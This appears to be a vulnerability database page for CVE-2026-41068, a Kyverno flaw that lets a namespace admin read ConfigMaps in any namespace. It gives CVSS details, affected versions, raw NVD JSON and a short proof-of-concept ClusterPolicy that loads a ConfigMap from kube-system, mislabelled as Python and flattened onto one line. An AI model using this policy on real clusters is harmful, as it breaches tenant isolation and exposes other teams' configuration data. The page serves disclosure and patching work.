Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-41068 CVSS 7.7 HIGH

CVE-2026-41068

Published: 2026-04-24 04:16:20
Last Modified: 2026-04-27 17:48:05
Source: [email protected]

Description

Kyverno is a policy engine designed for cloud native platform engineering teams. The patch for CVE-2026-22039 fixed cross-namespace privilege escalation in Kyverno's `apiCall` context by validating the `URLPath` field. However, the ConfigMap context loader has the identical vulnerability β€” the `configMap.namespace` field accepts any namespace with zero validation, allowing a namespace admin to read ConfigMaps from any namespace using Kyverno's privileged service account. This is a complete RBAC bypass in multi-tenant Kubernetes clusters. An updated fix is available in version 1.17.2.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:kyverno:kyverno:*:-:*:*:*:*:*:* - VULNERABLE
Kyverno < 1.17.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
apiVersion: kyverno.io/v1 kind: ClusterPolicy metadata: name: cve-2026-41068-poc spec: validationFailureAction: Audit background: false rules: - name: leak-sensitive-config match: resources: kinds: - Pod context: # Vulnerability: The namespace field is not validated against the user's RBAC. # This attempts to load a configmap from a restricted namespace (e.g., kube-system) - name: leaked-data configMap: name: sensitive-config namespace: kube-system validate: message: "PoC: Triggering context loading to bypass RBAC." pattern: spec: {}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41068", "sourceIdentifier": "[email protected]", "published": "2026-04-24T04:16:19.950", "lastModified": "2026-04-27T17:48:04.857", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kyverno is a policy engine designed for cloud native platform engineering teams. The patch for CVE-2026-22039 fixed cross-namespace privilege escalation in Kyverno's `apiCall` context by validating the `URLPath` field. However, the ConfigMap context loader has the identical vulnerability β€” the `configMap.namespace` field accepts any namespace with zero validation, allowing a namespace admin to read ConfigMaps from any namespace using Kyverno's privileged service account. This is a complete RBAC bypass in multi-tenant Kubernetes clusters. An updated fix is available in version 1.17.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kyverno:kyverno:*:-:*:*:*:*:*:*", "versionEndExcluding": "1.17.2", "matchCriteriaId": "6574A7FA-CE7D-4EB6-B036-044E07DB453A"}]}]}], "references": [{"url": "https://github.com/kyverno/kyverno/commit/bbf3e5c01391d612968440659028ae98e565a777", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-cvq5-hhx3-f99p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-cvq5-hhx3-f99p", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.